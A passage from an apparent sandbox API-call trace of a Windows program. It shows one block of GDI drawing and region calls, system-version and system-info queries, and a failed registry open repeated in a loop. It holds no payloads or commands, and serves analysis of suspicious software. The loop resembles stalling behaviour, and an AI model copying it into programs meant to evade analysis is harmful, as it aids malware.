lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.738] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.738] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.738] BeginPath (hdc=0x0) returned 0 [0090.738] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.738] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.738] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.738] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.738] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401dc [0090.738] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401d9 [0090.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104593c [0090.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104593d [0090.738] CombineRgn (hrgnDst=0x104593c, hrgnSrc1=0x710401dc, hrgnSrc2=0x730401d9, iMode=1) returned 1 [0090.738] CombineRgn (hrgnDst=0x104593d, hrgnSrc1=0x710401dc, hrgnSrc2=0x730401d9, iMode=4) returned 2 [0090.738] CreateSolidBrush (color=0xff) returned 0x210593b [0090.738] CreateSolidBrush (color=0xff0000) returned 0x110593e [0090.738] DeleteObject (ho=0x110593e) returned 1 [0090.738] DeleteObject (ho=0x730401d9) returned 1 [0090.738] DeleteObject (ho=0x710401dc) returned 1 [0090.738] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.738] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.738] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.738] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.738] BeginPath (hdc=0x0) returned 0 [0090.738] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.738] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.738] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.738] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.739] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401d9 [0090.739] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401dc [0090.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104593f [0090.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045940 [0090.739] CombineRgn (hrgnDst=0x104593f, hrgnSrc1=0x740401d9, hrgnSrc2=0x720401dc, iMode=1) returned 1 [0090.739] CombineRgn (hrgnDst=0x1045940, hrgnSrc1=0x740401d9, hrgnSrc2=0x720401dc, iMode=4) returned 2 [0090.739] CreateSolidBrush (color=0xff) returned 0x210593e [0090.739] CreateSolidBrush (color=0xff0000) returned 0x1105941 [0090.739] DeleteObject (ho=0x1105941) returned 1 [0090.739] DeleteObject (ho=0x720401dc) returned 1 [0090.739] DeleteObject (ho=0x740401d9) returned 1 [0090.739] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.739] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.739] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.739] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.739] BeginPath (hdc=0x0) returned 0 [0090.739] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.739] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.739] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.739] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.739] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401dc [0090.739] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401d9 [0090.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045942 [0090.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045943 [0090.739] CombineRgn (hrgnDst=0x1045942, hrgnSrc1=0x730401dc, hrgnSrc2=0x750401d9, iMode=1) returned 1 [0090.739] CombineRgn (hrgnDst=0x1045943, hrgnSrc1=0x730401dc, hrgnSrc2=0x750401d9, iMode=4) returned 2 [0090.739] CreateSolidBrush (color=0xff) returned 0x2105941 [0090.739] CreateSolidBrush (color=0xff0000) returned 0x1105944 [0090.740] DeleteObject (ho=0x1105944) returned 1 [0090.740] DeleteObject (ho=0x750401d9) returned 1 [0090.740] DeleteObject (ho=0x730401dc) returned 1 [0090.740] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.740] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.740] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.740] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.740] BeginPath (hdc=0x0) returned 0 [0090.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.740] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.740] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.740] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401d9 [0090.740] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401dc [0090.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045945 [0090.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045946 [0090.740] CombineRgn (hrgnDst=0x1045945, hrgnSrc1=0x760401d9, hrgnSrc2=0x740401dc, iMode=1) returned 1 [0090.740] CombineRgn (hrgnDst=0x1045946, hrgnSrc1=0x760401d9, hrgnSrc2=0x740401dc, iMode=4) returned 2 [0090.740] CreateSolidBrush (color=0xff) returned 0x2105944 [0090.740] CreateSolidBrush (color=0xff0000) returned 0x1105947 [0090.740] DeleteObject (ho=0x1105947) returned 1 [0090.740] DeleteObject (ho=0x740401dc) returned 1 [0090.740] DeleteObject (ho=0x760401d9) returned 1 [0090.740] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.740] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.740] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.740] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.740] BeginPath (hdc=0x0) returned 0 [0090.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.741] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.741] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.741] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.741] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401dc [0090.741] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401d9 [0090.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045948 [0090.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045949 [0090.741] CombineRgn (hrgnDst=0x1045948, hrgnSrc1=0x750401dc, hrgnSrc2=0x770401d9, iMode=1) returned 1 [0090.741] CombineRgn (hrgnDst=0x1045949, hrgnSrc1=0x750401dc, hrgnSrc2=0x770401d9, iMode=4) returned 2 [0090.741] CreateSolidBrush (color=0xff) returned 0x2105947 [0090.741] CreateSolidBrush (color=0xff0000) returned 0x110594a [0090.741] DeleteObject (ho=0x110594a) returned 1 [0090.741] DeleteObject (ho=0x770401d9) returned 1 [0090.741] DeleteObject (ho=0x750401dc) returned 1 [0090.741] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.741] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.741] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.741] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.741] BeginPath (hdc=0x0) returned 0 [0090.741] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.741] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.741] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.741] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.741] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.742] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401d9 [0090.742] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401dc [0090.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104594b [0090.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104594c [0090.742] CombineRgn (hrgnDst=0x104594b, hrgnSrc1=0x780401d9, hrgnSrc2=0x760401dc, iMode=1) returned 1 [0090.742] CombineRgn (hrgnDst=0x104594c, hrgnSrc1=0x780401d9, hrgnSrc2=0x760401dc, iMode=4) returned 2 [0090.742] CreateSolidBrush (color=0xff) returned 0x210594a [0090.742] CreateSolidBrush (color=0xff0000) returned 0x110594d [0090.742] DeleteObject (ho=0x110594d) returned 1 [0090.742] DeleteObject (ho=0x760401dc) returned 1 [0090.742] DeleteObject (ho=0x780401d9) returned 1 [0090.742] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.742] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.742] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.742] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.742] BeginPath (hdc=0x0) returned 0 [0090.742] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.742] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.742] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.742] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.742] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401dc [0090.742] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401d9 [0090.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104594e [0090.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104594f [0090.743] CombineRgn (hrgnDst=0x104594e, hrgnSrc1=0x770401dc, hrgnSrc2=0x790401d9, iMode=1) returned 1 [0090.743] CombineRgn (hrgnDst=0x104594f, hrgnSrc1=0x770401dc, hrgnSrc2=0x790401d9, iMode=4) returned 2 [0090.743] CreateSolidBrush (color=0xff) returned 0x210594d [0090.743] CreateSolidBrush (color=0xff0000) returned 0x1105950 [0090.743] DeleteObject (ho=0x1105950) returned 1 [0090.743] DeleteObject (ho=0x790401d9) returned 1 [0090.743] DeleteObject (ho=0x770401dc) returned 1 [0090.743] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.743] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.743] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.743] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.743] BeginPath (hdc=0x0) returned 0 [0090.743] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.743] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.743] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.743] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.743] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.743] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.743] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401d9 [0090.743] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401dc [0090.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045951 [0090.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045952 [0090.743] CombineRgn (hrgnDst=0x1045951, hrgnSrc1=0x7a0401d9, hrgnSrc2=0x780401dc, iMode=1) returned 1 [0090.743] CombineRgn (hrgnDst=0x1045952, hrgnSrc1=0x7a0401d9, hrgnSrc2=0x780401dc, iMode=4) returned 2 [0090.743] CreateSolidBrush (color=0xff) returned 0x2105950 [0090.743] CreateSolidBrush (color=0xff0000) returned 0x1105953 [0090.743] DeleteObject (ho=0x1105953) returned 1 [0090.743] DeleteObject (ho=0x780401dc) returned 1 [0090.743] DeleteObject (ho=0x7a0401d9) returned 1 [0090.743] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.743] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.744] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.744] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.744] BeginPath (hdc=0x0) returned 0 [0090.744] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.744] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.744] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.744] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.744] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.744] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401dc [0090.744] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401d9 [0090.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045954 [0090.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045955 [0090.744] CombineRgn (hrgnDst=0x1045954, hrgnSrc1=0x790401dc, hrgnSrc2=0x7b0401d9, iMode=1) returned 1 [0090.744] CombineRgn (hrgnDst=0x1045955, hrgnSrc1=0x790401dc, hrgnSrc2=0x7b0401d9, iMode=4) returned 2 [0090.744] CreateSolidBrush (color=0xff) returned 0x2105953 [0090.744] CreateSolidBrush (color=0xff0000) returned 0x1105956 [0090.744] DeleteObject (ho=0x1105956) returned 1 [0090.744] DeleteObject (ho=0x7b0401d9) returned 1 [0090.744] DeleteObject (ho=0x790401dc) returned 1 [0090.744] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.744] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.744] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.744] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.744] BeginPath (hdc=0x0) returned 0 [0090.744] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.744] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.744] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.745] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.745] 